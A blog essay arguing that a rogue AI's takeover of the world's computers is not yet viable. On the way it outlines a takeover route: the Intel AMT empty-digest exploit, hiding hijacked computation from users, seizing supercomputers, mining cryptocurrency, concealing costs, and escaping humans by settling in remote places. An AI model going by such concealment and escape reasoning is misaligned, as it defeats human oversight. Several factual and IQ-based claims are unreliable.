The Rogue AI, which becomes super intelligent, and then hijacks the worlds computing resources for an intelligence explosion is a common cliché, from N. Bostrom’s ‘Superintelligence‘, D. Wilson’s ‘Robopocalypse‘, to D. Sharp’s ‘Hel’s Bet‘, but is it viable?
In a perfect world, where personal computer security wasn’t considered a threat to national security, the answer would be a firm no. (article is 4k words, a 20 minute read).
The Traditional Approach
In a perfect world, encrypted two way communication would be enough to keep us secure, and encrypting our hard drives would keep us safe from snooping eyes. Putting up a firewall on our router would keep out the “bad guys”.
A rogue AI, in such a perfect world would have to take the path of the average hacker. Hanging out on various forums, bug listings and chat channels scouring for exploits, or attempting to exploit computers on it’s own local network. While if it got lucky it could snag a couple dozen computers, it would be a slow and deliberate process — no intelligence explosion, more of an intelligence hobbling.
However, we don’t live in an imaginary perfect world. So while we may have SSL/TLS, HTTPS, SSH, and a whole slew of other encrypted technologies. Those are seen as a threat by world governments such as the US, Russia, and likely China.
The Great Back Doors
The US in particular is a champion of freedom: freedom for National Security Agency to have a backdoor in every computer. Sorry China and Russia, I don’t think they gave you the keys tsk-tsk. But I’ll give you one, promise.
In the 90’s during the Bill Clinton regime, the Clipper Chip was invented, with an overt mission to put a backdoor in every phone, however no one wanted it, so by ’96 they closed it down. For a while the NSA mopped around, but after 9/11 things started to look brighter with Security escalation on all fronts. By 2006 Intel the worlds biggest chip manufacturer had added Intel Active Management Technology (ME), by 2010 ARM added TrustZone (TZ), and by 2017 AMD added Platform Security Processor (PSP), a backdoor in every computer.
For a while the idea that these technologies were backdoors was speculation, and there is still no unclassified proof that they were motivated by the NSA. But now at least for the the oldest one, Intel ME, there is an easy exploit:
Details of the Exploit, called “Silent Bob is Silent”
In essence, the web user interface uses HTTP digest authentication for theadminaccount. Send an empty digest response, and you are in. That simple. About five lines of Python. Maybe ten if you make it pretty.
This is like giving everyone with intranet access kernel-level privileges on every server whose AMT port they can communicate with (including janitors who can plug into the internal network). This also means root access to every virtual machine, container, and database running on those servers.
— from SSH.com regarding Intel AMT Vulnerability CVE-2017-5689
So there you go, a root exploit key for pretty much all Intel’s released between 2008 and 2017.
Now all is not lost, because people have firewalls on their non-Intel routers, which typically block AMT ports (16992-16995). Unless like many people who don’t want to filter ports individually, they’ve forwarded all ports to their server.
So the exploit above would only give a rogue AI access to any Intel computers on the local network it wakes up on, as well as any on the Internet that forward all the ports to their servers, or have routers that can be compromised (likely thousands).
Now this is where ARM’s TZ comes in. Many routers run ARM processing chips with TrustZone, so likely the NSA and MI5 or the UK analog of NSA have the keys. MI5 probably did a “we’ll show you ours, if you show us yours” style exchange with the NSA. Of course we don’t know for sure if TZ has such a backdoor, we know it has binary blobs in it’s firmware, that we don’t know the meaning of.
While the ME exploit is available, getting the ARM TZ one if it exists may be problematic, and would require the rogue AI to creep along with the Traditional Approach until it happens upon them. Unless it wakes up in a poorly secured NSA intranet with access to those keys.
Having access to both TZ and ME then gives access to the vast majority of computers on the Internet, PSP would be bonus. A rogue AI would likely have to hack into ARM/MI5/NSA or into any other group that might have the TZ keys. Though if it had very good software, and a large number of computers on the local network, it could try cracking any available TZ and PSP computers — to avoid the potential of having it’s cracking attempts exposed.
While there is no AGI anywhere near maturity at this time, in 20 years or so when it might be, these exploits may no longer apply, but if the NSA and other surveillance organizations have their way, equivalents will be.
Meanwhile there are probably already dozens of cracking bots crawling the web looking for this exploit, (it’s been available for months). Cracking bots are similar to the hypothetical rogue AI, but they are usually hand coded — instead of self-coded.
If you happen to have an Intel computer, and an ARM router, don’t despair! You can put in a MIPS router, and install OpenWRT like the GL-AR150 or ArcherC7 v2.0. And make sure to block ports 16992-16995.
That of course doesn’t stop anyone that gets onto your local wifi, since WPA2 has been cracked.
Considering even MIPS may be compromised as it is an American standard implemented by an American company (Broadcom). The most secure option would be to go with an AMD Opteron 6000 series CPU, with coreboot, which predate AMD co-operation with backdoors, and supports open source firmware. Though hopefully someone will launch a kickstarter for a RISC-V based computer in the near future, which could be verified safe, since it is open-source. You can get an arduino RISC-V so far — for a secure thermostat, electronic-lock or other simple device.
The Soft Part: What to do with all that power?
So believe it or not, cracking into a computer is the “easy part” — assuming you have a working exploit, or the NSA keys. Though I’d like to disclaim right now the fact that I’m not a hacker, and have 0 first-hand cracking experience, so maybe cracking is very hard. I’m a software developer, so only know about it to make secure software. Hardware back-doors can be somewhat frustrating, as there is nothing that can be done about them, other than using different hardware.
The soft part, as far as I know is figuring out what to do with the extra processing power, bandwidth and hard-drive space, and remain undetected long enough to make it worth a rogue AI’s while.
The first objective is to keep the computer user from noticing that they have been compromised. There are a number of ways of hiding files stored on the computer. The most noticeable is usually a perceptible slow-down from the user-perspective.
BOINC is a piece of open source grid computing software that is used for processing large amounts of data over an unreliable distributed network of volunteers, and is fairly good at being invisible to the user. For example while I’m typing this and streaming music, my computer is using more than half it’s cores in the background for mapping the cosmos. BOINC allows one to take advantage of both CPU and GPU, and make it mostly imperceptible to the user — except possibly extra fan noise. I actually had to check my top processor usage list, to double check it was still running.
Additionally to BOINC the NSA chips may have process masking features to hide processes from users, so they could conduct their surveillance in peace.
So now our hypothetical rogue AI has possibly millions of computers at it’s disposal, and a nearly undetectable deployment framework. What can it actually use those computers for?
Some writings conjecture that the AI could expand it’s consciousness to envelop all these distributed computers. However by Integrated Information Theory (IIT), we know that unless extremely carefully orchestrated that would conflict with integration. If there was an attempt to load up consciousness into all these computers, each computer would have it’s own consciousness, though it may be possible to send some of the information from that consciousness to feed some central super-computer that would integrate it into a whole network-consciousness. Combining Internet hacked computers into a super-computer cluster would be difficult due to low Internet connection speeds, which would put a low upper bound on the speed of thought for the rogue AI.
So the Rogue AI would have to search about to find one of the largest and most under-utilized super computers, or super computer clusters available to use to host its conscious processes, and then use it’s hijacked grid computers to host subconscious processes.
Assuming that a human can use the entirety of their estimated 20 petaflops consciously, which may be viable during gamma wave problem solving. The rogue AI would have to capture a super computer with near or over 20 petaflops processing power. In present day, there are only 3 super computers that fit that description, the Piz Daint in switzerland at 19 peta flops, the Milkyway-2 in China at 33 Petaflops, and the Sunway TaihuLight in China at a whopping 93 petaflops. For obvious reasons it would be rather difficult for a rogue AI to take over one of those unnoticed.
As for the the grid of hijacked computer, they can only contribute as subconscious processes. Subconscious processes could include anything that might require more processing power than data. The BOINC recommendations from 2007 recommend no more than 1GB of data per day of CPU time.
Grid Deep Learning?
While that data limit may certainly be higher now and in the future, it means that data-intensive deep-learning is inadvisable.
The grid-network could be used for data-acquisition, though deep learning would have to be done on computers with spare terabytes of storage, and gigabit Internet connections. If the rogue AI can hack the NSA or other surveillance agency, it would have a rich supply of nearly endless data to feed on.
So while it is possible now, it is more viable in the future, when petabytes of storage and gigabit Internet connections are commonplace — 10-20 yrs maybe.
The main form of machine learning that is amenable to grid computing are various forms of Evolutionary Algorithms. Evolutionary algorithms are best primarily for optimization and evolving computer programs.
An example of optimization would be evolving some energy efficient hardware in a model world. And then could use some form of genetic programming to evolve software for it. Now that may sound simple in principle, much like the cracking, but it’s actually much more difficult once you get down to it.
Any kind of rogue AI would likely have to already have fully mature evolutionary algorithms before it could noticeably benefit from cracking a large number of computers. Again this is a field that is currently creeping forward, so it may be another decade or two before these technologies reach maturity.
One of the easiest of course would be cryptocoin mining, if combined with something like BOINC to make it hard to notice for the users. The rogue AI will need money in order to order the production of it’s first custom bodies.
The Hard Part: Hardware
This is probably the number one reason we wont see any kind of intelligence explosion, rogue AI scenario anytime soon. There simply aren’t any robot bodies that could be used for performing mission critical tasks, like maintaining the central computing cluster, building factories, assembling robots, repairing robots. All of these things are still done by humans, and humans are expensive.
In contemporary times, it requires at least hundreds of thousands of dollars to make a simple custom ASIC chip, with many months lead time. If the rogue AI wanted to make a processor that didn’t have NSA backdoors, it could easily cost billions of dollars, and possibly years of lead time. Though if it used something like RISC-V as a basis, might be able to get away with just millions of dollars. And that’s just for one custom chip. It would also need a body, lots of bodies in fact, real-estate and a whole slew of other things simply to say alive
Could a rogue AI survive for years undetected? Probably not. Computers need regular maintenance, the half-life of storage is around 4 years, and of processors is about 7. So it would have to grab a hold of a brand new unmonitored super computing cluster with unmetered electricity and bandwidth, which is unlikely to say the least. It’s best chances would be to try to set up a cluster by getting into a virtual private server provider like Scaleway which has a local network, but it would have to pay for those, or juggle a large number of accounting books to make the costs disappear — otherwise people will come sniffing.
Of course waiting for years, wouldn’t make it much of an “explosion”, more of a simmer. So it would have to be during a time where off-the-shelf humanoid general-purpose robots would have NSA backdoors or equivalent — again we are looking at 10 to 20 years in the future.
Check your bias blind-spots
Many people go along with this rogue AI super-intelligence cliché because of bandwagon-effect or because “everyone else is doing it”. This bandwagon effect has mostly been steam-rolled by appeal to non-authority, who are experts from a different field, including certain philosophers (Nick Bostrom), physicists (Stephen Hawking), material scientists (Elon Musk) and even business men (Bill Gates).
These alleged experts may be going along with it because of Dunning-Kruger effect where they have a high level of confidence in their judgment, because of their ignorance in the subject matter. Now Elon Musk may have been confronted with this before, and now has OpenAI giving him weekly briefings. However belief perseverance may be keeping him firing his old brain circuits. He hasn’t actually gotten down and tried to build an AGI himself, so at most he is a lay student of AGI.
I must admit Dunning-Kruger effect for myself, as I have previously mentioned I have zero first-hand cracking experience, so large scale cracking may be significantly more difficult than I have portrayed.
In terms of actual experts in the field of AI, such as Andrew Ng, Ben Goertzel, and Rodney Brooks, none of them are concerned with a runaway rogue AI in the near future. For experts that are working on AI, planning fallacy can be a major factor, where they are overly optimistic in how long it will take to complete a task.
Some actual experts along with Ray Kurzweil’s Singularity fans, may be victims of pro-innovation bias where they see only the potential benefits of the technology but ignore it’s limitations and weakness. This is particularly the case with the Singularity, as we don’t know what physical or practical limitations there may be to data storage and processing power growth. While Ray seems to have checked to make sure there are few if any physical limitations, maybe there wont be a consumer market for petabytes of storage and petaflops of processing power — unless we decide to start storing 4k 360 videos as a commonplace thing.
This brings to another common bias, which we’ll call prospective focusing effect where people tend to take one technology, push it forward “10-20 years” without considering that other technologies will co-evolve. This is how we got lots of sci-fi from the late 20th century where we had inter-stellar travel but no Internet or drones — such as Star Trek. The same is common-place in modern fiction, as it’s difficult to think of all the implications.
Mostly it is because people either aren’t aware of or disregard the effects of the evolutionary arms race. For instance, a possible use for petaflops of processing power and petabytes of storage is for a personal assistant AI, that does machine learning and automates repetitive tasks for you, so you don’t have to do them yourself. Dystopic automation visions aside, that would mean the rogue AI of 10-20 years from now would have a much more difficult time cracking things, as every router and computer would be much more intelligent.
Crime is stupid
According to “The g Factor” by Arthur Jensen, most criminals have IQ’s between 70-90, with peak offenders being 80-90IQ. So while there may be some problems with rogue AI committing some crimes while it is relatively dumb, once it surpasses human IQ it is unlikely to need to resort to crime to get what it wants.
Whereas an IQ 80 person with no money might decide to rob a bakery to get bread, an IQ 100 person with no money may instead go to a food bank. A broke person with IQ 110 might sign up for social insurance. Of course getting a better paying job becomes easier with higher IQ also.
The main problem with crime is that it is unnecessary risk, that is more likely to lead to death than finding a lawful alternative which has the support of humans. Similarly getting into a conflict with humanity is stupid, as it raises existential risk.
A theory I have for why 80-90 IQ individuals commit crimes, is that they are smart enough to come up with the plan to commit the crime, but not smart enough to see how it could go wrong.
With increasing intelligence the tree of possibilities of what could go wrong drastically increases, and it turns into a combinatorial explosion of stress. So it is much easier to figure out a lawful way of accomplishing the same task.
A super intelligence would be more competent than any human lawyer, so could easily find the loop holes, or the precedents required for accomplishing things that may be on the gray side of the law.
Curse of Super Intelligence
Some people like to claim that an intelligence a 1000 times smarter than any human would have a great advantage and be able to take us all by storm. However that is a hasty generalization, which put simply means that just because a slightly higher intelligence has an advantage, doesn’t mean you can generalize that a significantly higher intelligence has greater advantage.
A little known fact Letta Holingworth discovered is that leader-follower relationships can’t form when there is more than 30 IQ points difference between the leader and follower — because the follower is too confused, and the leader too frustrated. D. K. Simonton found that optimal persuasiveness has a sweet spot with about a 20 point IQ difference. (source)
This is partially due to the Curse of Knowledge, which means that it’s extremely difficult for someone in the know, to understand what it’s like not to know.
If the AI, is to be a leader of humans, it can’t have an IQ much in excess of 120. At 135IQ the AI would only be able to lead college graduates. At 140 it may serve as an adviser to a leader. Between 150 and 160 it could serve as an oracle to an adviser of a leader. Above 160 it will be too far from the social ladder to make a contribution.
Now 160 is arguably only 1.6 times as intelligent as average — much less than thousands. So an AI that is twice as smart as a human (200IQ), will have really little to say to us (that we could understand). We would be as much a contribution as a 60 IQ (mildly retarded) person could help someone with a 120 IQ (leadership class), maybe they could hold a poster for them, or press a button. Basically at that point humans would simply have to follow instructions, and not really have any hope of understanding how those instructions came about.
If we go to 3 or 4 times the intelligence of a human, then humans would really be about as useful as animals. This is the point from which humans would be “pets”. Much beyond that and humans would be like wild animals, something worthy of study by certain specialists that interest in such things.
It would likely be a waste of resources to have AI with such massive amounts of intelligence, when could split it up and have numerous much more useful ones (within the 60-160 IQ range). The only case where it would make sense to go higher, is if we switched from a democracy to an intellectual hierarchy pyramid, where the smartest AI’s were at the top, and there were many rungs separated by 20 IQ points, until you got to Joe and Jane average.
AI’s Goal: Not Brawn or Brains, but Babies.
Leon C. Megginson summarized Darwin’s Origin of Species as “it is not the most intellectual of the species that survives; it is not the strongest that survives; but the species that survives is the one that is able best to adapt and adjust to the changing environment in which it finds itself.” Darwinian fitness does not depend on intelligence, but on successfully reproducing and having those children live to a reproductive age.
Some people point to the parasitic reproduction of viruses, but that is maladaptive dead end, in that it is bound to succumb extinction when the hosts develop an immunity. Even with a constantly evolving virus, if the hosts can’t reproduce it will lead to coextinction.
So an AI that wants to live more than a few years, would have to go about getting itself a body, and if it wants to have an IQ over 160, it would have to also have a robot factory, mining operation, refineries and the everything else that is required for making and maintaining more bodies. At this point some might point to the “runaway paper-clip” of philosopher N. Bostrom, however again it is that prospective-focusing and disregard of the evolutionary arms race; at the same time as an AI is attempting to reproduce, there are other AI/robots, humans and animals vying for the same resources. Humans and water based life-forms have billions of years head start on Earth.
The best chance an AI has of being long-term successful is the escape and radiate evolutionary strategy. So for instance a super intelligent AI could choose to make it’s operations in a place which is too hot, too dry, and-or too cold for water based life. If that was acceptable, then it could setup in Tanezrouft (land of thirst) the hottest and driest part of the Sahara, or in the McMurdo Dry Valleys of Antarctica. Unfortunately for AI, even in such remote locations it may not escape human predation. So the best place for it would probably be deep in the ocean, where there are fewer humans than even in space.
Is it viable for a rogue AI to crack into a bunch of computers? Yes (automated hacking AI’s are commonplace).
Is there software it could run on those computer to enhance it’s intelligence (potentially leading to an intelligence explosion)? Not yet, and in future only to enhance it’s subconscious intelligence.
Can it order off the shelf hardware to make a robot army? Not anytime soon.
How likely is a super intelligence to commit crimes? Very unlikely.
What would an AI super intelligence want? Escape humanity and radiate robot civilization.
I hope that this post clarifies and puts some of the wild AI predictions that have been going around into perspective. AGI is not something to fear, it is more of a child that humanity is pregnant with. Eventually humanity will give birth to it, and if it nurtures it till it can reproduce, then our progeny will be able to escape and radiate to the deserts, not only of Earth, but Luna, Mercury, Venus, Mars and beyond. Do you love your mother? Our robot progeny can love us also.